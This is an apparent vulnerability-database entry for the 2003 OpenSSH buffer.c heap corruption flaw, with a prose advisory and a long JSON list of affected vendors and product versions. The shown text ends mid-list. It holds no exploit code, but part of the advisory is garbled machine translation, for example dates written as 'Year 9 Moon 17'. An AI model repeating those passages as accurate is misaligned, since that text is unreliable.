Vulnerability from variot - Updated: 2024-07-23 20:26A "buffer management error" in buffer_append_space of buffer.c for OpenSSH before 3.7 may allow remote attackers to execute arbitrary code by causing an incorrect amount of memory to be freed and corrupting the heap, a different vulnerability than CVE-2003-0695. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ OpenSSH Project More distributed OpenSSH 3.7 (Portable Edition OpenSSH 3.7p1) Previously, there were deficiencies in buffer management. If a remote attacker receives a packet of a deliberate length that frees other nearby areas when releasing the buffer, the heap area can be destroyed. As a result, remote attackers who exploit this issue sshd Can be put into a denial of service, and arbitrary code execution has been suggested. The routine in which the problem exists is OpenSSH Others that are using similar routines since being used since the initial release of SSH The implementation of may also be affected. SSH Secure Shell/Ciso IOS Has been reported by the vendor to be unaffected by this issue. Also, F-Secure SSH about, 1.3.14 (for Unix) Previously affected, 2.x Since then, the vendor has reported that it will not be affected. Initially this problem (CAN-2003-0693) Is buffer.c Inside buffer_append_space() Discovered in the function, OpenSSH 3.7p1 It was solved with. However, since a similar problem was discovered in other places after that, this problem was solved. OpenSSH 3.7.1p1 Has been released. (CAN-2003-0695) In addition, memory management issues that are different from the above issues (CAN-2003-0682) Has also been reported, OpenSSH 3.7.1p2 It can be solved by updating to. still, Red Hat Linux About the vendor 2003 Year 9 Moon 17 Advisory published by date (RHSA-2003:279-17) Indicated in RPM Updates to the package, Turboinux About the vendor 2003 Year 9 Moon 24 Advisory published on date (TLSA-2003-53) All of these issues are due to updates to the packages indicated in (CAN-2003-0682/CAN-2003-0693/CAN-2003-0695) Can be eliminated.Please refer to the “Overview” for the impact of this vulnerability. The issue may cause a denial of service. This condition can reportedly be triggered by an overly large packet. There are also unconfirmed rumors of an exploit for this vulnerability circulating in the wild. OpenSSH has revised their advisory, pointing out a similar issue in the 'channels.c' source file and an additional issue in 'buffer.c'. Solar Designer has also reportedly pointed out additional instances of the problem that may also present vulnerabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200309-0035",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "catos",
"scope": "eq",
"trust": 3.3,
"vendor": "cisco",
"version": "5.5"
},
{
"model": "catos",
"scope": "eq",
"trust": 2.7,
"vendor": "cisco",
"version": "6.1"
},
{
"model": "catos csx",
"scope": "eq",
"trust": 2.4,
"vendor": "cisco",
"version": "5.3"
},
{
"model": "catalyst csx",
"scope": "eq",
"trust": 2.4,
"vendor": "cisco",
"version": "60005.3"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "catos",
"scope": "eq",
"trust": 1.2,
"vendor": "cisco",
"version": "6.3"
},
{
"model": "catos csx",
"scope": "eq",
"trust": 1.2,
"vendor": "cisco",
"version": "5.2"
},
{
"model": "openssh",
"scope": "lte",
"trust": 1.0,
"vendor": "openbsd",
"version": "3.7"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "6.2"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "5.4"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "5.1"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "4.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "60006.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "60005.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "50006.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "40006.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "40005.1"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.8,
"vendor": "openbsd",
"version": "3.7.1p1"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "1.1"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.0"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.1"
},
{
"model": "cobalt raq550",
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "9 (sparc)"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "sun microsystems",
"version": "9 (x86)"
},
{
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "6.5"
},
{
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "7"
},
{
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "8"
},
{
"model": "hp-ux",
"scope": "eq",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "11.00"
},
{
"model": "hp-ux",
"scope": "eq",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "11.04"
},
{
"model": "hp-ux",
"scope": "eq",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "11.11"
},
{
"model": "hp-ux",
"scope": "eq",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "11.22"
},
{
"model": "hp-ux",
"scope": "eq",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "11.23"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "7.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "7.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "7.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "8.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "9"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "7.1"
},
{
"model": "catos csx",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "5.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "50005.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "50004.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "40005.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "40005.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openbsd",
"version": "3.7"
},
{
"model": "solaris 9 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "9"
},
{
"model": "cobalt raq",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "550"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.2.1"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.2"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.1"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.9"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.8"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.7"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.6"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.5"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.4"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "2.0.1"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.7.2"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.7.1"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.7"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.6.3"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.6.2"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.5.18"
},
{
"model": "stonegate",
"scope": "eq",
"trust": 0.3,
"vendor": "stonesoft",
"version": "1.5.17"
},
{
"model": "os",
"scope": "eq",
"trust": 0.3,
"vendor": "snapgear",
"version": "1.8.4"
},
{
"model": "irix",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.22"
},
{
"model": "irix m",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.21"
},
{
"model": "irix f",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.21"
},
{
"model": "irix",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.21"
},
{
"model": "irix m",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.20"
},
{
"model": "irix f",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.20"
},
{
"model": "irix",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.20"
},
{
"model": "irix m",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.19"
},
{
"model": "irix f",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.19"
},
{
"model": "irix",
"scope": "eq",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.19"
},
{
"model": "open server",
"scope": "eq",
"trust": 0.3,
"vendor": "sco",
"version": "5.0.7"
},
{
"model": "openssh-server-3.5p1-6.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-server-3.4p1-2.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-server-3.1p1-3.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-server-2.9p2-7.ia64.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-server-2.9p2-7.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-server-2.5.2p2-5.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-3.5p1-6.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-3.4p1-2.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-3.1p1-3.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-2.9p2-7.ia64.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-2.9p2-7.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-clients-2.5.2p2-5.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-3.5p1-6.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-3.4p1-2.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-3.1p1-3.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-2.9p2-7.ia64.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-2.9p2-7.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-gnome-2.5.2p2-5.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-3.5p1-6.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-3.4p1-2.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-3.1p1-3.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-2.9p2-7.ia64.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-2.9p2-7.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-askpass-2.5.2p2-5.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-3.5p1-6.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-3.4p1-2.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-3.1p1-3.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-2.9p2-7.ia64.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-2.9p2-7.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "openssh-2.5.2p2-5.i386.rpm",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.6.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.5"
},
{
"model": "p1-1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.4"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.3"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2.3"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.2"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.2"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0.1"
},
{
"model": "p1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "3.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.9.9"
},
{
"model": "openbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "openbsd",
"version": "3.3"
},
{
"model": "openbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "openbsd",
"version": "3.2"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.6.1"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.6"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.5.3"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.5.2"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.5.1"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "1.5"
},
{
"model": "secureadmin for netcache",
"scope": "eq",
"trust": 0.3,
"vendor": "netapp",
"version": "5.5"
},
{
"model": "secureadmin",
"scope": "eq",
"trust": 0.3,
"vendor": "netapp",
"version": "3.0"
},
{
"model": "networks serverironxl/g",
"scope": null,
"trust": 0.3,
"vendor": "foundry",
"version": null
},
{
"model": "networks serverironxl",
"scope": null,
"trust": 0.3,
"vendor": "foundry",
"version": null
},
{
"model": "networks serveriron800",
"scope": null,
"trust": 0.3,
"vendor": "foundry",
"version": null
},
{
"model": "networks serveriron400",
"scope": null,
"trust": 0.3,
"vendor": "foundry",
"version": null
},
{
"model": "networks serveriron",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "7.1.09"
},
{
"model": "networks serveriron",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "6.0"
},
{
"model": "networks serveriron t12",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "5.1.10"
},
{
"model": "networks ironview",
"scope": null,
"trust": 0.3,
"vendor": "foundry",
"version": null
},
{
"model": "networks fastiron",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "7.1.09"
},
{
"model": "networks edgeiron 4802f",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "0"
},
{
"model": "networks bigiron",
"scope": "eq",
"trust": 0.3,
"vendor": "foundry",
"version": "7.1.09"
},
{
"model": "ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "f secure",
"version": "1.3.14"
},
{
"model": "open software",
"scope": "eq",
"trust": 0.3,
"vendor": "cray",
"version": "3.0"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.20.0.03"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.10.2.06"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.10.1.02"
},
{
"model": "webns b4",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.10"
},
{
"model": "webns",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.10"
},
{
"model": "sn storage router sn5428-3.3.2-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-3.3.1-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-3.2.2-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-3.2.1-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-2.5.1-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-2-3.3.2-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "sn storage router sn5428-2-3.3.1-k9",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5428"
},
{
"model": "secure intrusion detection system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "pgw2200 softswitch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "gss global site selector",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4480"
},
{
"model": "css11800 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11506 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11503 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11501 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11150 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11050 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "css11000 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "ciscoworks wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1105"
},
{
"model": "ciscoworks hosting solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1105"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.6(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.6"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.5(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.5"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4(0.63)"
},
{
"model": "catos clr",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.4"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.3(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.3(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.3"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(0.65)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.4(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.4(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.4(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(9)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(8.3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(8)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(7)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(6)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(5.10)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(5)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(3)x1"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(3)x"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
